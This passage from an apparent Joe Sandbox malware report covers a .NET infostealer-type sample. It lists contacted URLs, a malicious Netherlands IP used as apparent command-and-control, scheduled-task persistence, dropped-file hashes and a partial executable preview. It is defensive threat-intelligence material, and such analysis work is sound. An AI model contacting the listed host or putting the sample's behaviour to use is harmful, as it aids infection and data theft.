                      http://schemas.xmlsoap.org/soap/envelope/AJzHYZtQIb.exe, 00000015.00000002.2357626482.000000000300B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.w3.orAJzHYZtQIb.exe, 00000010.00000002.2245706074.0000000002F69000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/AJzHYZtQIb.exe, 00000015.00000002.2357626482.000000000300B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/CheckConnectPO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drfalse
                      • URL Reputation: safe
                      unknown
                      https://www.ecosia.org/newtab/tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Endpoint/VerifyUpdateResponsePO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.chiark.greenend.org.uk/~sgtatham/putty/0PO.exefalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/SetEnvironmentAJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/SetEnvironmentResponsePO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/GetUpdatesAJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000003019000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://ac.ecosia.org/autocomplete?q=tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drfalse
                      • URL Reputation: safe
                      unknown
                      https://api.ipify.orgcookies//settinString.RemovegPO.exe, PO.exe, 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressingPO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/GetUpdatesResponsePO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Endpoint/EnvironmentSettingsResponsePO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/VerifyUpdatePO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/0PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO.exe, 00000007.00000002.2160002789.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2245706074.0000000003018000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drfalse
                      • URL Reputation: safe
                      unknown
                      http://45.137.22.67:55615t-AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/soap/actor/nextPO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.aforgenet.com/framework/PO.exefalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      45.137.22.67
                      unknownNetherlands
                      51447ROOTLAYERNETNLtrue
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1457840
                      Start date and time:2024-06-15 20:21:09 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 8m 46s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:24
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:w4XFffGDz1.exe
                      renamed because original name is a hash value
                      Original Sample Name:2185ecde5380054ad075b7a25ae0ea51.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@22/104@2/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 393
                      • Number of non-executed functions: 84
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, Microsoft.Photos.exe, SIHClient.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
                      • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      TimeTypeDescription
                      14:22:03API Interceptor34x Sleep call for process: PO.exe modified
                      14:22:09API Interceptor37x Sleep call for process: powershell.exe modified
                      14:22:13API Interceptor45x Sleep call for process: AJzHYZtQIb.exe modified
                      14:22:13API Interceptor1x Sleep call for process: w4XFffGDz1.exe modified
                      20:22:11Task SchedulerRun new task: AJzHYZtQIb path: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      No context
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      ROOTLAYERNETNLZVKDbYLukd.exeGet hashmaliciousRedLineBrowse
                      • 45.137.22.68
                      ccf8db74632bae4cedb4401ce2ce21ed0f656e1d869577f731ecf00a0cc3818f_dump.exeGet hashmaliciousRedLineBrowse
                      • 45.137.22.111
                      tdmMbgf2u2.exeGet hashmaliciousRedLineBrowse
                      • 45.137.22.111
                      xFV3JxX1zK.rtfGet hashmaliciousUnknownBrowse
                      • 185.222.58.78
                      Product Specification Details.xlsGet hashmaliciousRemcosBrowse
                      • 185.222.58.78
                      Teklif talebi.xlsGet hashmaliciousAgentTeslaBrowse
                      • 185.222.58.78
                      vw5ZOiGUyl.exeGet hashmaliciousGuLoaderBrowse
                      • 185.222.58.62
                      RFQ 8968792.xlsGet hashmaliciousAgentTeslaBrowse
                      • 185.222.58.78
                      Payment_Advice-pdf.exeGet hashmaliciousRemcosBrowse
                      • 45.137.22.103
                      MWsRU5nbvJ.exeGet hashmaliciousRedLineBrowse
                      • 45.137.22.173
                      No context
                      No context
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:false
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:modified
                      Size (bytes):2232
                      Entropy (8bit):5.379552885213346
                      Encrypted:false
                      SSDEEP:48:fWSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMugeC/ZM0Uyus:fLHxvCZfIfSKRHmOugw1s
                      MD5:236CE6553B5DB20FA0B07F9FEA88F4A4
                      SHA1:AEB5B156162EC5CD4E0BC3A0BA0F0D4739D40DBD
                      SHA-256:3849E9437770B9804D942D293FFAB3C6449B82BA23C0CD3D48DE2C318938FCAD
                      SHA-512:90B07AFD72EE353BEA8E2C7ECBB8CDAFB965C91E1B32C5FFE971F60C69004FDEBF5BA429B4DD455210772D2494A8AD60930A8F01C289D0199998A7CC36050FD6
                      Malicious:false
                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                      Process:C:\Users\user\Desktop\w4XFffGDz1.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):743944
                      Entropy (8bit):7.615457036874597
                      Encrypted:false
                      SSDEEP:12288:Sxtg61jjk0LAta9A15fraDI+Jpaf6F+CfdGoZ8LFCSz4vtwD/zxmkR:wg61jjk0LAta9A+DIMaf6MCF18LXz
                      MD5:86F98523CEB67DF5CC3431A839F63134
                      SHA1:160A60824E1ADC4C0FFD5959341C6DAE4DA2E76B
                      SHA-256:0E43D560502493DFADE28C5822081232EE47FD42C233F9FF473C467E51297E27
                      SHA-512:CD6D79DBF6E8EC3663570F584760DB9AC50E190B4CC6E12630CB31796A88912B26556B08E01E803D3EC06874263FBDEB9AC73C8C5CD67E2749D32EBA7A23C7B7
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 88%
                      • Antivirus: Virustotal, Detection: 58%, Browse
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'.gf..............0..............#... ...@....@.. ....................................@.................................."..O....@..L............$...6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc...L....@......................@..@.reloc.......`......."..............@..B................."......H.......P...."..........P...p+...........................................0..\........(.....(.....{....r...po.....{....r...p(.......(.......(....rC..p(....o.....{....r...po....*br...p( ...&.{.....o!...*..("...*z.,..{....,..{....o#.....($...*.0...........s%...}.....s&...}.....s'...}.....s(...}.....s%...}.....{....o)....(*....{.....o+....{....r-..p"..@A.. ....s,...o-....{.... ......s....o/....{....r?..po0....{.....9..s1...o2....{.....o3....{....rU..po.....{.....o+....{....r-..p"
                      Process:C:\Users\user\Desktop\w4XFffGDz1.exe
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 390x552, components 3
                      Category:dropped
                      Size (bytes):49161
                      Entropy (8bit):7.9640442162988965
                      Encrypted:false
                      SSDEEP:768:LWTHytOtCeYfsfd8HAeA5Sz8Q3X1taN5adCKWEnMAyk8n/syo:qTj7Yfsfd8Ha5Sz/nHaN5adrlYsf
                      MD5:E83CCB51EE74EFD2A221BE293D23C69A
                      SHA1:4365CA564F7CDD7337CF0F83AC5FD64317FB4C32
                      SHA-256:DA931852A19A707D01C3EDF138622B8601056C42525F8AC40CB48AF43A7410CC
                      SHA-512:0252E629FBDAFDB66FF63EF76D18F25D1CA46AC3EFF019F012361DB45EBD34D1A7A9AD35F7A2FC5830676C771997633F3ABF1DC3224BD8F6BD55456B0A554A46
                      Malicious:false
                      Preview:......JFIF.....`.`.....C....................................................................C.......................................................................(...."................................................................................`...4....0CI.#..!..i..`..!..i..`..!..i..`..!..i..`..!..i..`....f.....8q.+..k...8..............\4..V^..._....o.....S..6......C?......../.;..G.~...J}fw..o.).B..S~..l..o...?|.]...'/...@...7...+.........>..}#..7.......n....+4_.......c].;....J%Ye}....c.3...-..O..[y.!../@......f.....0....#p....|u.2.Yc[.%v.[.?..P.=K..D.,z.zN.......(...._Qv..i.........7...+..l.doY.z.E...%7..._.6..sU.;k-.:K.H.i.Y.........B...Q...IZ..SR..R........U..0y.&l^.}...X.3Q.s3..#=.....].6&...Z6..i...e"K..&C...<...>....?..........-%...\;p.....7_..............:r..B.8....p...4...[.eN..e.P...+.^......bB..Y...>?l.wIlr.KG.L..`.....$z..FTu....`....u.{.@.......4.iK.OQ.......R-.(.g?%...................>;F......L+d.......m.S.+`...h3.v#.a.P.......
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
